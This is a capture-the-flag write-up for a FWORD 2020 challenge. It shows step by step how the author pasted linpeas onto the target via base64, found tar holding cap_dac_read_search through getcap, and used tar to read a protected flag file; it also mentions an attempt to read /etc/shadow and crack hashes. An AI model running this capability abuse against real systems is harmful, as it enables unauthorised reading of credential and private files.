Tags: capabilities
# fword-ctf-writeups
Writeup for FWORD 2020 CTF
This challenge was quit nice, i actually spent a great deal of time just to put linpeas on the box, i ended up converting the linpeas script to base64, then copied and pasted it in the machine using echo (there's probably a better way to do this, but i was too lazy to think of anything else)
so at my attack machine:
`cat linpeas.sh | base64 > linpeas.b64`
copy the result
on target host:
`echo "base64 string" > linenum.b64`
`cat linpeas.b64 | base64 -d > linpeas.sh`
at first time i missed it, so it took me quit some time,
actually the name of the challenge gives us a hint.
running the following:
`getcap -r / 2>/dev/null`
gives us:
`/usr/bin/tar = cap_dac_read_search+ep`
this caught my attention as i do not normally see this.
after doing some research, i found out that this actually gives tar premission to read any file!
so i initially tried to read /etc/shadow and crack the hast- that got me nowhere.
it took me a minute to realize i just need the flag.txt file!
so doing this:
`cd /tmp` #so we will be somewhere with write premissions
`tar -cvf flag.tar ~/flag.txt` # read the flag file from the home directory, and store it in flag.tar
`tar -xvf flag.tar` # extract the flag file
now we can:
`cat /tmp/home/user1/flag.txt`
and we got the flag!